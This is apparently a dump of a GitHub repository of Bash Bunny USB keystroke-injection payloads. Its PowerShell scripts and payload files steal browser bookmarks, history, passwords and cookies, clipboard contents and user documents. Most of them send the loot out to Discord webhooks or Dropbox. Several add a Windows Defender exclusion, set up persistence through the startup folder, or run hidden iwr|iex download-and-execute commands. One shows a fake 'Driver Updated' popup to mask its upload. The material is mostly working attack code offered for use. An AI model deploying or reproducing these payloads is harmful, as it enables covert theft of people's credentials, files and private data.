[
  {
    "path": "Assets/placeholder",
    "content": "\n"
  },
  {
    "path": "BashBunny/payloads/Bookmark-Hog/BBB.ps1",
    "content": "#Bookmark-Hog\r\n\r\n# Get Drive Letter\r\n$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name\r\n\r\n# Test if directory exists if not create directory in loot folder to store file\r\n$TARGETDIR = \"$bb\\loot\\Bookmark-Hog\\$env:computername\\Chromebm.txt\"\r\n$TARGETDIR2 = \"$bb\\loot\\Bookmark-Hog\\$env:computername\\Edgebm.txt\"\r\n\r\nif(!(Test-Path -Path $TARGETDIR )){\r\n    mkdir $TARGETDIR\r\n}\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The chrome bookmark file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n  else {\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks\" -Destination \"$TARGETDIR\" \r\n }\r\n\r\n\r\n# See if file is a thing\r\nCopy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -Destination \"$TARGETDIR2\" \r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The edge bookmark file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Chrome Bookmarks to Bash Bunny\r\n else {\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks\" -Destination \"$TARGETDIR2\" \r\n}"
  },
  {
    "path": "BashBunny/payloads/Bookmark-Hog/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?\" width=\"200\">\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Bookmark-Hog\n\nA payload to exfiltrate bookmarks of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the bookmark history \nThese files will be saved to the bash bunny in the loot directory\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Let the magic happen\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Bookmark-Hog/payload.txt",
    "content": "# Title:         Bookmark-Hog\r\n# Description:   This payload is meant to exfiltrate bookmarks to the bash bunny.\r\n# Author:        atomiczsec\r\n# Version:       1.0\r\n# Category:      Exfiltration\r\n# Attackmodes:   HID, Storage\r\n# Target:        Windows 10, 11\r\n\r\nLED SETUP\r\n\r\nGET SWITCH_POSITION\r\n\r\nATTACKMODE HID STORAGE\r\n\r\nLED STAGE1\r\n\r\nQUACK DELAY 3000\r\nQUACK GUI r\r\nQUACK DELAY 100\r\nLED STAGE2\r\nQUACK STRING powershell -NoP -NonI -W Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\\\$SWITCH_POSITION\\BBB.ps1')\"\r\nQUACK ENTER"
  },
  {
    "path": "BashBunny/payloads/Bookmark-Hog/placeholder",
    "content": "\n"
  },
  {
    "path": "BashBunny/payloads/Browser-Grab/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Grab!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Browser-Grab\n\nA payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\n\n## Description\n\nThis payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe\nThis payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nFinally, discord will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Admin privileges on the Device you are targeting\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Browser-Grab/b.ps1",
    "content": "function Upload-Discord {\n\n[CmdletBinding()]\nparam (\n    [parameter(Position=0,Mandatory=$False)]\n    [string]$file,\n    [parameter(Position=1,Mandatory=$False)]\n    [string]$text \n)\n\n$hookurl = 'YOUR-DISCORD-WEBHOOK'\n\n$Body = @{\n  'username' = $env:username\n  'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\n\n\n# Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download\nAdd-MpPreference -ExclusionPath $env:tmp\n\n# Download the exe and save it to temp directory\niwr \"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true\" -outfile \"$env:tmp\\browser.exe\"\n\n# Execute the Browser Stealer\ncd $env:tmp;Start-Process -FilePath \"$env:tmp\\browser.exe\" -WindowStyle h -Wait\n\n# Exfiltrate the loot to discord\nCompress-Archive -Path \"$env:tmp\\results\" -DestinationPath $env:tmp\\browserdata.zip\nUpload-Discord -file \"$env:tmp\\browserdata.zip\"\n"
  },
  {
    "path": "BashBunny/payloads/Browser-Grab/payload.txt",
    "content": "REM     Title: Browser-Grab\nREM     Author: atomiczsec\nREM     Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers\nREM     Target: Windows 10\n\n\nQ DELAY 2000\nQ GUI r \nQ DELAY 1000\nQ STRING powershell start-process powershell -verb runas\nQ ENTER\nQ DELAY 1000\nQ ALT y\nQ DELAY 1000\nQ STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex\nQ ENTER\n\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly"
  },
  {
    "path": "BashBunny/payloads/Copy-And-Waste/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "BashBunny/payloads/Copy-And-Waste/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Copy-And-Waste\n\nA payload to exfiltrate clipboard contents\n\n## Description\n\nThis payload uses iwr to download 2 files \n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, waiting for a Ctrl + C or Ctrl + X click \n\nThen the contents will then be sent to the discord webhook for viewing pleasure\n\nFor killing the script press both Ctrl buttons at the same time [It will resume at reboot]\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Copy-And-Waste/c.ps1",
    "content": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n  [CmdletBinding()]\r\n  param (    \r\n  [Parameter (Position=0,Mandatory = $True)]\r\n  [string]$con\r\n  ) \r\n  \r\n  $hookUrl = 'YOUR DISCORD WEBHOOK'\r\n  \r\n$Body = @{\r\n  'username' = $env:username\r\n  'content' = $con\r\n}\r\n\r\n\r\nInvoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body\r\n\r\n}\r\n\r\n\r\ndischat (get-clipboard)\r\n\r\nwhile (1){\r\n    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')\r\n    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)\r\n    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)\r\n    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)\r\n\r\n       if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}\r\n       elseif ($Rctrl -and $Lctrl) {dischat \"---------connection lost----------\";exit}\r\n       else {continue}\r\n} "
  },
  {
    "path": "BashBunny/payloads/Copy-And-Waste/payload.txt",
    "content": "REM     Title: Copy-And-Waste\r\n\r\nREM     Author: atomiczsec & I am Jakoby\r\n\r\nREM     Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "BashBunny/payloads/Copy-And-Waste/placeholder",
    "content": "\n"
  },
  {
    "path": "BashBunny/payloads/De-Bloater/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;De-Bloater!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# De-Bloater\n\nA payload to quickly get \"Windows10Debloater\"\n\n## Description\nThis script will download \"Windows10Debloater\" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10 \n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n```\niwr -useb https://git.io/debloat|iex\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n[Sycnex](https://github.com/Sycnex/Windows10Debloater)\n[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Doc-Hog/d.ps1",
    "content": "function Doc-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n      'username' = $env:username\n      'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Files = Get-ChildItem -Path \"$env:HOMEPATH\" -Include \"*.docx\",\"*.doc\",\"*.pptx\",\"*.xlsx\",\"*.pdf\",\"*.jpeg\",\"*.png\",\"*.jpg\",\"*.csv\",\"*.txt\" -Recurse\n\n$types = @{\n    \"*.docx\" = \"Word\";\n    \"*.doc\" = \"Word\";\n    \"*.pptx\" = \"PowerPoint\";\n    \"*.xlsx\" = \"Excel\";\n    \"*.pdf\" = \"PDF\";\n    \"*.jpeg\" = \"JPEG\";\n    \"*.png\" = \"PNG\";\n    \"*.jpg\" = \"JPEG\";\n    \"*.csv\" = \"CSV\";\n    \"*.txt\" = \"Text\";\n}\n\nforeach ($type in $types.Keys) {\n    $filteredFiles = $Files | Where-Object {$_.Name -like $type}\n\n    if ($filteredFiles) {\n        $zipFile = \"$env:TEMP\\$($types[$type]).zip\"\n\n        $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n        Doc-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n    }\n}\n"
  },
  {
    "path": "BashBunny/payloads/Doc-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\nDEFINE URL http://new-url.com/powershell.ps1\r\n\r\nREM     Target: Windows 10\r\nQUACK DELAY 2000\r\nQUACK GUI r\r\nQUACK DELAY 500\r\nQUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl\r\nQUACK ENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "BashBunny/payloads/Doc-Hog/readme.md",
    "content": "\r\n<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#getting-started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# Doc-Hog\r\n\r\nA payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV\r\n\r\n## Description\r\n\r\nThis payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "BashBunny/payloads/History-Pig/HP.ps1",
    "content": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Chrome History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The Edge History file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Edge History to Temp Directory to get sent to Dropbox\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"ADD-YOUR-DROPBOX-TOKEN-HERE\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "BashBunny/payloads/History-Pig/README.md",
